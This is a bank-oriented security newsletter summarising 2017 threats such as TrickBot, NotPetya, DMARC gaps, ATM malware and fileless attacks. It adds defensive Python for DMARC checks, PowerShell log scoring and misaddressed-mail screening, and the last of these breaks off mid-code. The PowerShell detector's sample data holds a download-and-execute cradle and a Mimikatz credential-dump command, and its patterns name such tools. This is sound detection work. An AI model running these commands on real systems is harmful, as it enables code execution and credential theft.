Bancsec Advisor


WannaCry Inspires Banking Trojan to Add Self-Spreading Ability

(August 2, 2017)

Researchers have discovered a new version of the credential-stealing TrickBot banking Trojan with worm-like capabilities similar to those of WannaCry and NotPetya. TrickBot is still delivered initially through email attachments, but it can now use the Windows Server Message Block (SMB) protocol to spread across the local network, after which it tricks users into entering their banking credentials on fake login pages. To protect against this threat, apply security patches promptly, limit SMB traffic between workstations, and train users in the safe handling of email attachments and links.

Relevant URL(s): https://thehackernews.com/2017/08/trickbot-banking-trojan.html


White House Advisers Warn of CNI Cyber-9/11

(August 23, 2017)

The National Infrastructure Advisory Council (NIAC) recently released a report warning that a 9/11-scale attack on critical national infrastructure (CNI) is possible and that the window to prepare for it is narrow. The council states that although the private sector and the government have the capabilities and resources to defend against such an attack, they are not properly organized or focused. Its recommendations include establishing separate, secure networks for the most critical CNI systems, adopting best-in-class assessment practices and scanning tools, and proactively sharing threat intelligence.

Relevant URL(s): https://www.infosecurity-magazine.com/news/white-house-advisers-warn-of-cni/


Phish Bait: DMARC Adoption Failures Leave Companies Exposed

(August 23, 2017)

Researchers at Agari analyzed DNS records to measure Domain-based Message Authentication, Reporting & Conformance (DMARC) adoption and policy settings across top companies. DMARC builds on SPF and DKIM: a domain owner publishes a DNS TXT record that tells receiving mail servers how to treat messages that fail authentication (monitor only, quarantine, or reject) and where to send reports. Agari found that, because most companies publish either no record or a monitor-only policy, more than 90% of Fortune 500 companies are leaving customers, business partners, and their brand exposed to spoofing. Banks should move their domains to an enforcing policy (p=quarantine or p=reject) to mitigate phishing and other domain impersonation attacks.
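
As an added illustration (not Agari's tooling or part of the article), the following Python classifies DMARC records into the buckets the survey distinguishes: missing, monitor-only (p=none), partially enforcing (pct below 100) and enforcing. The records and domain names are constructed; a real check would fetch the TXT record at _dmarc.<domain>.

```python
"""Classify DMARC records as missing, monitor-only, partial or enforcing.

Added example, not from the Agari report or the article. The records below are
constructed for illustration; in practice you fetch the TXT record at _dmarc.<domain>.
"""
from dataclasses import dataclass
from typing import Optional

# Constructed sample records keyed by hypothetical domain names.
SAMPLE_RECORDS = {
    "no-dmarc.example": None,                                  # no _dmarc TXT record published
    "monitor-only.example": "v=DMARC1; p=none; rua=mailto:dmarc@monitor-only.example",
    "partial.example": "v=DMARC1; p=reject; pct=25; rua=mailto:dmarc@partial.example",
    "quarantine.example": "v=DMARC1; p=quarantine; sp=none; adkim=s; aspf=s",
    "enforcing.example": "v=DMARC1;p=reject;rua=mailto:agg@enforcing.example;ruf=mailto:f@enforcing.example",
    "broken.example": "v=SPF1 -all",                           # wrong record type published at _dmarc
}


@dataclass
class DmarcAssessment:
    domain: str
    policy: Optional[str]            # p= value, or None when there is no valid record
    subdomain_policy: Optional[str]  # sp= value; defaults to p= when absent
    pct: int                         # share of failing mail the policy applies to
    reporting: bool                  # rua= present, so the owner actually sees failures
    status: str                      # "missing" | "invalid" | "monitor" | "partial" | "enforcing"


def parse_dmarc(record: str) -> dict:
    """Parse 'tag=value; tag=value' into a dict. Returns {} if this is not a DMARC record."""
    tags = {}
    for part in record.split(";"):
        if "=" not in part:
            continue
        key, value = part.split("=", 1)
        tags[key.strip().lower()] = value.strip()
    if tags.get("v", "").upper() != "DMARC1" or "p" not in tags:
        return {}
    return tags


def assess(domain: str, record: Optional[str]) -> DmarcAssessment:
    if record is None:
        return DmarcAssessment(domain, None, None, 0, False, "missing")
    tags = parse_dmarc(record)
    if not tags:
        return DmarcAssessment(domain, None, None, 0, False, "invalid")
    policy = tags["p"].lower()
    subdomain_policy = tags.get("sp", policy).lower()
    try:
        pct = int(tags.get("pct", "100"))
    except ValueError:
        pct = 100
    reporting = "rua" in tags
    if policy == "none":
        status = "monitor"                         # receivers get no instruction to act
    elif policy in ("quarantine", "reject"):
        status = "enforcing" if pct == 100 else "partial"
    else:
        status = "invalid"
    return DmarcAssessment(domain, policy, subdomain_policy, pct, reporting, status)


def survey(records: dict) -> dict:
    """Count domains per status, e.g. {'enforcing': 2, 'monitor': 1, ...}."""
    counts = {}
    for domain, record in records.items():
        status = assess(domain, record).status
        counts[status] = counts.get(status, 0) + 1
    return counts


if __name__ == "__main__":
    for domain, record in SAMPLE_RECORDS.items():
        a = assess(domain, record)
        print(f"{domain:22} {a.status:9} p={a.policy} sp={a.subdomain_policy} pct={a.pct} rua={a.reporting}")
    print(survey(SAMPLE_RECORDS))
```

A p=none record is useful for collecting reports but gives receivers no instruction to reject spoofed mail, which is why it counts as unprotected here. Note also that sp= defaults to the p= value, so a reject policy on the apex domain does not protect subdomains if sp=none is published alongside it.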

Relevant URL(s): https://www.darkreading.com/vulnerabilities---threats/phish-bait-dmarc-adoption-failures-leave-companies-exposed/d/d-id/1329702


Dumping Data from Deep-Insert Skimmers

(August 22, 2017)

KrebsOnSecurity was contacted by a police detective to help identify some strange devices found on two men caught maxing out stolen credit cards. These devices appear to allow thieves to retrieve card data from deep-insert skimmers without having to remove them. Deep-insert skimmers are placed within the card reader transport, completely hidden from view at the front of the ATM. Consumers should avoid standalone ATMs in low-lit areas, and stick to those that are physically installed at the bank when possible. It is also recommended to cover the number pad when entering your PIN.

Relevant URL(s): https://krebsonsecurity.com/2017/08/dumping-data-from-deep-insert-skimmers/


Ukraine Central Bank Detects Massive Attack Preparation

(August 21, 2017)

The National Bank of Ukraine has warned of a new attack targeting financial services firms that may be a precursor to another attack of NotPetya proportions. Upon initial distribution, it was not detected by standard anti-virus solutions. Although Ukraine may be the target of this new attack, as with NotPetya, it could spread to organizations in other countries. Application whitelisting and adaptive anti-malware can be integrated into cybersecurity programs to better protect endpoints from threats such as this.

Relevant URL(s): https://www.bankinfosecurity.com/ukraine-central-bank-detects-massive-attack-preparation-a-10209


US Banks Targeted with Trickbot Trojan

(July 20, 2017)

Trickbot, a banking Trojan that specifically targets financial organizations, is now being aimed at customers of US banks; until recently it was used only against institutions abroad. Account takeover and fraud are its main goals. Other banking Trojans are also being delivered through the Emotet loader. Both threats spread through spam campaigns and social engineering. Multiple layers of security, such as phishing and social engineering awareness training, adaptive endpoint protection, and continuous monitoring of network activity, can help protect against them.

Relevant URL(s): https://www.darkreading.com/attacks-breaches/us-banks-targeted-with-trickbot-trojan/d/d-id/1329417


One of the Biggest Ethereum and Bitcoin Exchanges Got Hacked

(July 5, 2017)

One of the largest Ethereum and Bitcoin cryptocurrency exchanges, Bithumb, was the recent victim of a data breach. Names, mobile phone numbers, and email addresses of more than 31,800 customers were stolen from the personal computer of a Bithumb employee. These customers are now being targeted in an effort to drain their digital currency wallets. Banks can avoid similar breaches by implementing an effective data loss prevention solution and prohibiting employees from storing sensitive information on personal devices.

Relevant URL(s): http://fortune.com/2017/07/05/bitcoin-ethereum-bithumb-hack/


Swiss Users Targeted with Windows, macOS Banking Trojan

(July 11, 2017)

Swiss users have been the recent target of banking malware that works on both macOS and Windows. The phishing emails carry two attachments so that the target is infected whichever operating system they use. Both variants work the same way: the victim's traffic is intercepted and redirected to a spoofed version of their bank's login page. Sophisticated endpoint protection or application whitelisting can be used to thwart this type of malware.

Relevant URL(s): https://www.helpnetsecurity.com/2017/07/11/swiss-users-macos-banking-trojan/


Critical Flaw Found in Windows NTLM Security Protocol

(July 11, 2017)

Researchers recently disclosed two vulnerabilities in the Windows NT LAN Manager (NTLM) authentication protocol that allow an attacker who can relay NTLM credentials to create new domain administrator accounts. NTLM is an older protocol that Microsoft superseded with Kerberos but still supports, and it remains widely used. Microsoft addressed the issue in its July patch cycle; note that the fix for the LDAP relay variant only takes effect once domain controllers are configured to require LDAP channel binding, so patching alone is not enough. Servers with NTLM enabled should be patched and configured as soon as possible, and NTLM traffic should be restricted on bank networks, for example by first auditing and then blocking it with the "Network security: Restrict NTLM" Group Policy settings.

Relevant URL(s): http://thehackernews.com/2017/07/windows-ntlm-security-flaw.html


Critical RCE Vulnerability Found in Cisco WebEx Extensions, Again

(July 17, 2017)

A critical vulnerability was recently identified in Cisco Systems' WebEx browser extensions for Chrome and Firefox that allows attackers to execute malicious code on the victim's computer. All that is required for successful exploitation is tricking the victim into visiting a web page that contains malicious code, which then runs with the privileges of the browser user. Cisco WebEx browser extensions for Chrome and Firefox should be updated to the latest version as soon as possible, and users should work from non-administrative Windows accounts so that code running in the browser cannot modify the system.

Relevant URL(s): http://thehackernews.com/2017/07/cisco-webex-vulnerability.html


Cyberattack Hits Ukraine Then Spreads Internationally

(June 27, 2017)

What started as an apparent attack on Ukrainian government and business systems in late June ended up crippling tens of thousands of machines worldwide. The outbreak was the latest in a series of attacks to use the EternalBlue SMB exploit stolen from the National Security Agency. The malware was dubbed NotPetya because it masquerades as the older Petya ransomware. As with WannaCry, banks can limit their exposure by patching promptly and disabling unnecessary services such as SMBv1; because NotPetya also moved laterally using stolen administrator credentials over legitimate remote-administration tools, limiting where privileged credentials are used matters as well.

Relevant URL(s): https://www.nytimes.com/2017/06/27/technology/ransomware-hackers.html


Kaspersky: Online Banking Hacks Cost Banks Nearly $1.8M Each

(June 19, 2017)

According to a new report from Kaspersky Lab, cybersecurity incidents involving online banking services cost banks an average of almost $1.8 million each. Many of these incidents also carry additional costs, such as reputation damage, data loss, or leaks of confidential information, and when a bank falls victim to a distributed denial of service (DDoS) attack, customers can lose trust in it. Since banks are such lucrative targets, they need to go the extra mile to protect themselves against cyberattacks.

Relevant URL(s): http://www.ciodive.com/news/kaspersky-online-banking-hacks-cost-banks-nearly-18m-each/445248/


Most Organizations Believe Their Mainframe is More Secure Than Other Systems

(June 7, 2017)

A recent survey shows that 78 percent of organizations believe their mainframe is more secure than other systems, while 84 percent say they have “blind spots” regarding what mainframe data is accessed and how it’s used. Organizations face the risk that mainframe data may be misused by employees or others that gain unauthorized access to the system. Banks should collect, manage, and analyze mainframe audit logs to limit risk.

Relevant URL(s): https://www.helpnetsecurity.com/2017/06/07/mainframe-secure/


HIDDEN COBRA – North Korea’s DDoS Botnet Infrastructure

(June 13, 2017)

Cyber actors of the North Korean government have been using a malware variant known as DeltaCharlie to target the media, financial, aerospace and other critical infrastructure sectors of the United States. These cyber actors, referred to as HIDDEN COBRA, have leveraged their capabilities to target and compromise victims for many years. Tools used by HIDDEN COBRA include DDoS botnets, remote access tools (RATs), keyloggers, and wiper malware. Mitigation strategies to defend against their common attacks include application whitelisting, up-to-date operating systems and third-party software, restrictive privileges, and network segmentation.

Relevant URL(s): https://www.us-cert.gov/ncas/alerts/TA17-164A


Poor Endpoint Security Can Cost You Millions in Detection, Response, and Wasted Time

(June 13, 2017)

A new study reveals that many companies are not efficiently protecting their sensitive data, and organizations are wasting an average of $6 million on the time to detect and contain insecure endpoints. The study also reveals that organizations are finding it difficult to identify rogue, off-network, or out-of-compliance devices, increasing their attack surface. To better protect endpoints, banks can leverage adaptive anti-malware and application whitelisting.

Relevant URL(s): https://www.helpnetsecurity.com/2017/06/13/poor-endpoint-security/


Massive Cyberattack Targeting 99 Countries Causes Sweeping Havoc

(May 13, 2017)

One of the most widespread and damaging cyberattacks in history struck in May, affecting major companies, hospitals, and government agencies in at least 99 countries. The ransomware, dubbed WannaCry, encrypted the files on infected computers until a ransom was paid, and included worm-like functionality that let it spread to other computers on the network. The worm exploited an SMBv1 vulnerability in Windows for which Microsoft had released a patch in March, two months before the outbreak. Banks can limit their exposure to this and similar attacks by ensuring machines are patched promptly, SMBv1 is disabled, and all unnecessary services are turned off.

Relevant URL(s): http://money.cnn.com/2017/05/12/technology/ransomware-attack-nsa-microsoft/index.html


Bank Account Hackers Used SS7 to Intercept Security Codes

(May 5, 2017)

Online banking customers were recently targeted by a two-stage attack designed to siphon money from their accounts. The first stage was a phishing email that led victims to a phony bank website where they were asked to enter their login information and registered mobile phone number. In the second stage the fraudsters abused the SS7 signalling protocol used between telephone carriers to redirect the victims' calls and SMS messages to an attacker-controlled number, intercepting the one-time authentication codes and completing fund transfers. Because SMS is only as secure as the carrier network that delivers it, banks should offer separate, hardware-based (or at minimum app-based) forms of multi-factor authentication that do not depend on the customer's phone number.

Relevant URL(s): http://www.bankinfosecurity.com/bank-account-hackers-used-ss7-to-intercept-security-codes-a-9893


Google Docs Phishing Attack Abuses Legitimate Third-Party Sharing

(May 3, 2017)

Users of Google services were the recent target of an extremely convincing phishing campaign that abused Google Docs' third-party sharing mechanism. Targets received messages, often from senders they knew, that appeared to be a shared document. Links within these messages led to a genuine Google permissions page for a malicious third-party app named "Google Docs"; granting it access gave the attackers full access to the victim's mailbox and contacts, and the same message was then sent to all of that user's contacts. Google has shut down the abusive app, but anyone who clicked through should revoke it under their account's connected apps, and emails that look suspicious in any way should always be treated with extreme caution.

Relevant URL(s): http://www.darkreading.com/attacks-breaches/google-docs-phishing-attack-abuses-legitimate-third-party-sharing-/d/d-id/1328797


FBI: Business- and Email Account Compromise Attack Losses Hit $5 Billion

(May 5, 2017)

The FBI’s Internet Crime Complaint Center (IC3) recently reported a 2,370% increase in losses related to business email compromise (BEC) and email account compromise (EAC) between January 2015 and December 2016. These attacks, which are typically carried out after careful study of the victim and social engineering, have reportedly caused $5.3 billion in loss for global and domestic companies over a three-year period. Significant transactions should always require a dual-approval process and verbal verification with the requester, even when appearing to come from a trusted source.

Relevant URL(s): http://www.darkreading.com/attacks-breaches/fbi-business--and-email-account-compromise-attack-losses-hit-$5-billion/d/d-id/1328812


Blackmoon Banking Trojan Goes Modular

(May 5, 2017)

The Blackmoon banking Trojan has been seen targeting users in South Korea with a new framework built to evade detection. The framework chains three separate downloaders that execute in a tightly coupled sequence, each fetching the next component, until the final payload is installed. Blackmoon is typically distributed through malicious sites and online advertisements, and the modular design makes it easy for the authors to retarget users in other countries. Because of its evasive behavior, sophisticated endpoint protection or application whitelisting should be used to block its execution.

Relevant URL(s): http://www.darkreading.com/attacks-breaches/blackmoon-banking-trojan-goes-modular-/d/d-id/1328814


Banks Must Focus More on Cyber-Risk

(April 5, 2017)

Online financial transactions have become essential to everyday life, and banks face a growing volume of cyberattacks. In October 2016 the Federal Reserve, FDIC, and OCC jointly proposed Enhanced Cyber Risk Management Standards for large, interconnected institutions, designed to increase their focus on resilience against cyberattacks and on cyber-risk mitigation.

Relevant URL(s): http://www.darkreading.com/endpoint/banks-must-focus-more-on-cyber-risk/a/d-id/1328566


Cybercriminals Seized Control of Brazilian Bank for 5 Hours

(April 4, 2017)

In October 2016, cybercriminals took over all 36 domains belonging to a Brazilian bank for about five hours. During that window the attackers controlled the bank's online and mobile banking, point-of-sale, and investment transaction traffic, and, by experts' estimates, potentially millions of the bank's customers around the world, including in the US, were served malware designed to harvest their data. The attack became possible after the criminals obtained administrative access to the bank's account at its DNS registrar and repointed the domains to attacker-controlled infrastructure, fronted by valid TLS certificates issued for the hijacked names. Multi-factor authentication on critical systems such as DNS and registrar management, registrar locks, and monitoring of DNS records and newly issued certificates for the bank's domains can help thwart attacks such as this.

Relevant URL(s): http://www.darkreading.com/attacks-breaches/cybercriminals-seized-control-of-brazilian-bank-for-5-hours/d/d-id/1328549


Health Savings Account Fraud: The Rapidly Growing Threat

(April 14, 2017)

Health savings account (HSA) fraud, a serious threat with ties to healthcare breaches, has been increasing in frequency since 2016. Victims’ “fullz”, or full listing of personally identifiable information (PII) obtained from compromised healthcare institutions, are being used by malicious actors to gain illicit access to funds, transfer money from the accounts, and even transfer funds to prepaid cards opened in the victim’s name. Preventing this type of fraud can be difficult, but monitoring account balances and activity closely and reporting potential indicators of compromise can reduce the extent of the damages.

Relevant URL(s): http://www.darkreading.com/endpoint/health-savings-account-fraud-the-rapidly-growing-threat/a/d-id/1328633


Mobile Payment Card Cloning: Understanding the Risks

(April 12, 2017)

The use of mobile contactless payments has been growing quickly, as well as Host Card Emulation (HCE), or emulating payment cards on a mobile device. An IT Security Consultant with SecuRing has recently revealed that it’s possible to copy mobile contactless card data to another device, allowing an attacker to use it for payment transactions. Banks deploying HCE technology in their mobile payment applications should test against card cloning attacks and be sure server side fraud detection is in place.

Relevant URL(s): https://www.helpnetsecurity.com/2017/04/12/mobile-payment-card-cloning/


ATMitch: Remote Administration of ATMs

(April 4, 2017)

Investigation into several recent fileless attacks led researchers to new ATM malware, dubbed ATMitch. The malware, which can empty an ATM of its cash and then delete itself, was installed on ATMs over Remote Desktop (RDP) connections from inside the bank's network, meaning the attackers had already compromised the bank itself. ATMitch works on any ATM that supports the XFS standard, which the researchers say covers the vast majority of machines. Application whitelisting should be used on ATMs to help prevent this and other types of malware, and RDP access to ATMs should be restricted and logged.

Relevant URL(s): https://securelist.com/blog/sas/77918/atmitch-remote-administration-of-atms/


Banking Agencies Issue Joint Report to Congress

(March 21, 2017)

Members of the FFIEC issued a joint report to Congress regarding their review of rules affecting financial institutions. The Economic Growth and Regulatory Paperwork Reduction Act (EGRPRA) requires the federal banking agencies and FFIEC to conduct reviews of their rules at least every 10 years in order to identify outdated and unnecessary regulations. The banking agencies published requests for written comment and received over 250 comment letters. The report describes several joint actions taken or planned by the regulators.

Relevant URL(s): https://www.ffiec.gov/press/pr032117.htm


NY Breach Report Highlights Third-Party Risk

(March 29, 2017)

In 2016, New York had one of the highest data exposure rates in the state's history, with the annual number of reported security breaches increasing by 60%. 81 percent of the 1,300 reported breaches involved the loss of Social Security numbers or financial information. As banks consider their security controls, they also need to think about ensuring their third-party service provider's controls meet their requirements and expectations.

Relevant URL(s): http://www.csoonline.com/article/3185908/security/expert-ny-breach-report-highlights-third-party-risk.html


Over One Million Fraud Attacks on Financial Firms in 2016

(March 1, 2017)

After financial firms were hit by more than one million fraud attacks in 2016 from scammers exploiting gaps in anti-fraud controls, experts warn that this year may be worse. ThreatMetrix, which recently released its Q4 2016 Cybercrime Report, blocked more than 80 million attacks using stolen or fake credentials in the financial sector during 2016, and reports that the number of attacks jumped 150% from Q3 to Q4 2016. Although preventing this type of fraud is difficult, banks can use behavioral and device analytics to help identify and mitigate the risk.

Relevant URL(s): https://www.infosecurity-magazine.com/news/over-one-million-fraud-attacks/


Dridex Trojan Gets AtomBombing Update

(March 1, 2017)

Dridex, one of the most prolific banking Trojans, has been updated with a new code injection technique known as AtomBombing, which abuses Windows atom tables to write code into legitimate processes without the API calls that anti-virus products watch for, letting it infect endpoints under the radar. The update shows how quickly attackers adopt newly published research. To protect endpoints, banks can incorporate adaptive anti-malware and application whitelisting into their security programs.

Relevant URL(s): https://www.infosecurity-magazine.com/news/dridex-trojan-gets-atombombing


Hackers Using Fake Cellphone Towers to Spread Android Banking Trojan

(March 22, 2017)

Researchers have discovered that Chinese criminals are using fake base transceiver stations (BTS) to carry out SMiShing attacks, or phishing messages sent via SMS. The malware being distributed is targeting Android users' banking credentials and can bypass two-factor authentication. Researchers have warned that although this threat has only been seen in China so far, it could quickly spread worldwide. As always, users should keep their mobile devices updated to the latest version and avoid installing apps from third-party app stores.

Relevant URL(s): http://thehackernews.com/2017/03/rogue-bts-android-malware.html


Banks Around the World Targeted in Watering Hole Attacks

(February 14, 2017)

Polish banks were recently the victim of malware that was inadvertently distributed to them by their own financial regulator, the Polish Financial Supervision Authority (KNF). As affected banks shared indicators of compromise, other banks around the globe found that they had been hit as well. The majority of affected institutions are banks in the US, Poland, Mexico, UK, and Chile. Banks should update their defense systems with the indicators of compromise provided by BAE and Symantec to help identify and block this attack.

Relevant URL(s): https://www.helpnetsecurity.com/2017/02/14/banks-watering-hole-attacks/


Fast Food Chain Arby’s Acknowledges Breach

(February 17, 2017)

A spokesman for Arby's confirmed rumors that they had recently remediated a breach that affected hundreds of their restaurant locations nationwide. The breach, which is estimated to have occurred between October 25, 2016, and January 19, 2017, involved malicious software installed on payment card systems at the restaurants. Consumers should always remember to watch their card statements closely and report suspicious or unauthorized transactions.

Relevant URL(s): https://krebsonsecurity.com/2017/02/fast-food-chain-arbys-acknowledges-breach/


A Rash of Invisible, Fileless Malware is Infecting Banks Around the Globe

(February 8, 2017)

Fileless malware is going mainstream. Researchers at Kaspersky Lab have found that at least 140 bank and other enterprise networks have been infected by malware that resides only in the memory of the compromised computers, with persistence hidden in the Windows registry rather than in files on disk. The infections are difficult to detect, partly because the attackers rely on legitimate administrative and penetration-testing tools such as PowerShell, Metasploit, and Mimikatz. Because Windows itself depends on PowerShell, disabling it outright is rarely practical; banks should instead restrict it to the administrators who need it, enable script block logging so that in-memory activity still leaves a record, and ensure network segregation is properly implemented.
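
What logging buys you is the ability to score how PowerShell is launched. The following Python, an added example rather than Kaspersky's detection logic, scores constructed process-creation records (shaped like the command-line field of Windows Security event 4688; the field names and sample values are assumed) for the traits the in-memory tooling described above relies on: hidden or policy-bypassing flags, a base64-encoded command, and content that pulls code straight into memory.

```python
"""Flag PowerShell invocations typical of in-memory (fileless) tooling from process-creation logs.

Added example, not Kaspersky's detection logic. The events are constructed samples shaped
like the command-line field of Windows Security event 4688; field names are assumed.
"""
import base64
import re
from typing import Dict, List

# Constructed sample process-creation records. Not real telemetry.
SAMPLE_EVENTS = [
    {"pid": 4120, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1"},
    {"pid": 5032, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc "
                + base64.b64encode("IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.5/a')"
                                   .encode("utf-16le")).decode()},
    {"pid": 5100, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -ExecutionPolicy Bypass -Command \"Invoke-Mimikatz -DumpCreds\""},
    {"pid": 6011, "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /c dir"},
]

# Flags that hide the console or disable policy, the encoded-command argument, and
# content that loads code straight into memory (download cradles, reflective loading, credential dumping).
HIDE_FLAGS = re.compile(
    r"(?i)(?:^|\s)-(?:w(?:indowstyle)?\s+hidden|nop(?:rofile)?|noni(?:nteractive)?"
    r"|ep\s+bypass|executionpolicy\s+bypass)")
ENC_ARG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")
IN_MEMORY = re.compile(
    r"(?i)(IEX|Invoke-Expression|DownloadString|FromBase64String|Reflection\.Assembly"
    r"|Invoke-Mimikatz|Invoke-ReflectivePEInjection|VirtualAlloc)")


def decode_encoded_command(cmdline: str) -> str:
    """Return the decoded -EncodedCommand payload (PowerShell base64-encodes UTF-16LE), or '' if absent/invalid."""
    m = ENC_ARG.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return ""


def score_event(event: Dict) -> Dict:
    """Score one process-creation event: which indicators fired and the decoded payload, if any."""
    if not event["image"].lower().endswith("powershell.exe"):
        return {"pid": event["pid"], "score": 0, "indicators": [], "decoded": ""}
    cmd = event["cmdline"]
    decoded = decode_encoded_command(cmd)
    indicators = []
    if HIDE_FLAGS.search(cmd):
        indicators.append("hidden/bypass flags")
    if decoded:
        indicators.append("encoded command")
    # Scan the visible command line (minus the base64 blob) plus the decoded payload.
    text = ENC_ARG.sub(" ", cmd) + " " + decoded
    hits = {m.group(1) for m in IN_MEMORY.finditer(text)}
    indicators.extend(sorted(hits))
    return {"pid": event["pid"], "score": len(indicators), "indicators": indicators, "decoded": decoded}


def suspicious(events: List[Dict], threshold: int = 2) -> List[Dict]:
    """Events with at least `threshold` indicators; a lone -ExecutionPolicy Bypass is too common to alert on."""
    return [s for s in (score_event(e) for e in events) if s["score"] >= threshold]


if __name__ == "__main__":
    for finding in suspicious(SAMPLE_EVENTS):
        print(finding["pid"], finding["indicators"], finding["decoded"][:60])
```

PowerShell encodes -EncodedCommand payloads as base64 over UTF-16LE, so the decoder must use that encoding or the payload reads as garbage. The threshold of two indicators keeps the scheduled backup script (only a policy bypass) from alerting, while the hidden-window download cradle and the Mimikatz invocation both fire. Scoring the decoded payload is the point: on disk there is nothing to scan, but the command line that launched the in-memory stage is still logged.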

Relevant URL(s): https://arstechnica.com/security/2017/02/a-rash-of-invisible-fileless-malware-is-infecting-banks-around-the-globe/


Zeus-Derived Flokibot Malware Invades PoS

(January 31, 2017)

Ever since the source code for Zeus leaked in 2011 via underground forums, malicious actors have continued to refine the banking Trojan to help them steal banking credentials and infect point-of-sale (POS) devices. The latest example, Flokibot, includes a redesigned stealth dropper that is used to install other malicious code and is designed to evade anti-virus scans. The malware captures payment card numbers, as well as the encrypted PINs. Monitoring POS systems for data exfiltration and unusual network connections can help block this attack vector.

Relevant URL(s): http://www.bankinfosecurity.com/blogs/zeus-derived-malware-continues-to-pwn-pos-devices-p-2384


Infected Weather App's Forecast: Malware

(February 22, 2017)

A legitimate Android app, Good Weather, was recently discovered to contain a Trojan capable of delivering banking malware. The malware is capable of accessing the victim's banking credentials and can bypass some two-factor authentication. Android users should carefully review the permissions that apps request and mobile antivirus software should be used.

Relevant URL(s): https://www.scmagazine.com/infected-weather-apps-forecast-malware/article/639512/


ABA Endorses Anti-Phishing and Brand Protection Solution by Easy Solutions

(February 7, 2017)

Easy Solutions' digital threat protection suite has been endorsed by the American Bankers Association through its subsidiary, the Corporation for American Banking. The endorsement follows ABA's due diligence, oversight from ABA's Endorsed Solutions Banker Advisory Council, and research support from the cybersecurity company Bancsec. The suite, which includes anti-phishing monitoring and brand protection services, is now the solution of choice for ABA members.

Relevant URL(s): http://www.aba.com/Press/Pages/020717EasySolutionsEndorsement.aspx


Stolen Passwords Fuel Cardless ATM Fraud

(January 17, 2017)

"Cardless ATM" transactions, a new offering from several financial institutions that lets customers withdraw cash using their mobile phones, are opening up new opportunities for thieves. With this technology, a customer enters the amount to withdraw in the mobile banking app, then completes the transaction at the ATM with a numeric code or by presenting a QR code. As reported by krebsonsecurity.com, criminals are already using stolen online banking credentials to enroll their own phones on victims' accounts and cash out through this service. Banks looking to offer the feature should pair it with behavioral analytics, low withdrawal limits, and validation of new customers and newly enrolled mobile devices to identify and mitigate the risk.

Relevant URL(s): https://krebsonsecurity.com/2017/01/stolen-passwords-fuel-cardless-atm-fraud/


Carbanak's Back And Using Google Services For Command-and-Control

(January 17, 2017)

The Carbanak group, blamed in 2015 for stealing as much as $1 billion from banks, has resurfaced with a new approach: using Google services for command and control of its malware. Routing traffic through a trusted third-party service lets the attackers hide in plain sight, since it blends in with legitimate use. The malware is typically delivered via phishing emails, which employees who receive regular, adaptive security awareness training and testing are more likely to recognize and report.

Relevant URL(s): http://www.darkreading.com/cloud/carbanaks-back-and-using-google-services-for-command-and-control/d/d-id/1327909


ATM Malware Retooled to Strike More Machines

(January 16, 2017)

FireEye Labs recently identified a previously unseen version of Ploutus, one of the most advanced ATM malware families, first discovered in 2013. The new version, dubbed Ploutus-D, interacts with KAL's Kalignite ATM platform, which supports hardware from 40 different ATM vendors. If a criminal gains access to the ATM's internals, thousands of dollars can be dispensed in minutes. Banks with ATMs running Kalignite can take advantage of its built-in security features, such as application whitelisting, disabled USB ports, and BitLocker full-disk encryption.

Relevant URL(s): http://www.bankinfosecurity.com/blogs/latin-american-atm-malware-set-to-strike-more-machines-p-2361


Bank Leaks 60,000 Account Details in Three Character Email Slip-up

(January 9, 2017)

One of Australia's largest banks recently sent an email containing data on 60,000 bank accounts to an unknown external recipient by accident. The bank owns the nab.com.au domain but not nab.com, and the data was mistakenly sent to an address at the nab.com domain. It is likely that no harm was done; however, neither the bank nor its customers can be certain. A data loss prevention solution that screens outbound recipients and content, combined with email encryption, can help banks ensure a similar mistake doesn't catch them off guard.
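
The following Python, an added example rather than anything from the article or the bank, is the outbound-mail recipient check that would have caught this slip: it flags recipient domains that are a truncated or extended form of a domain the bank owns, or within one typo of it, and holds mail carrying account data to any external address. The owned-domain list, the messages and the contains_account_data flag (assumed to come from a content classifier) are constructed.

```python
"""Outbound-mail recipient check for the nab.com / nab.com.au kind of slip.

Added example, not from the article or the bank. The owned-domain list, the messages and
the contains_account_data flag (assumed to come from a content classifier) are constructed.
"""
from typing import Dict, List

OWN_DOMAINS = {"nab.com.au"}   # constructed: the domains the bank actually controls

# Constructed outbound messages as a mail gateway might present them.
SAMPLE_MESSAGES = [
    {"id": 1, "to": ["ops@nab.com"], "contains_account_data": True},             # the article's slip
    {"id": 2, "to": ["auditor@partner.example"], "contains_account_data": True},
    {"id": 3, "to": ["team@nab.com.au", "lead@nab.com.au"], "contains_account_data": True},
    {"id": 4, "to": ["bob@nab.co.au"], "contains_account_data": False},          # one-character typo
    {"id": 5, "to": ["news@vendor.example"], "contains_account_data": False},
]


def labels(domain: str) -> List[str]:
    return domain.lower().strip(".").split(".")


def is_truncated_or_extended(candidate: str, own: str) -> bool:
    """True when candidate differs from own only by dropped or added trailing labels,
    e.g. nab.com vs nab.com.au, or nab.com.au.example vs nab.com.au."""
    c, o = labels(candidate), labels(own)
    if c == o:
        return False
    shorter, longer = (c, o) if len(c) < len(o) else (o, c)
    return len(shorter) >= 2 and longer[:len(shorter)] == shorter


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance; catches single-character typos such as nab.co.au."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify_recipient(address: str) -> str:
    """'internal' (a domain we own), 'lookalike' (near-miss of one we own) or 'external'."""
    domain = address.rsplit("@", 1)[-1].lower()
    if domain in OWN_DOMAINS:
        return "internal"
    for own in OWN_DOMAINS:
        if is_truncated_or_extended(domain, own) or edit_distance(domain, own) <= 1:
            return "lookalike"
    return "external"


def screen_message(msg: Dict) -> Dict:
    """Gateway decision: 'block' if any recipient is a lookalike of our own domain,
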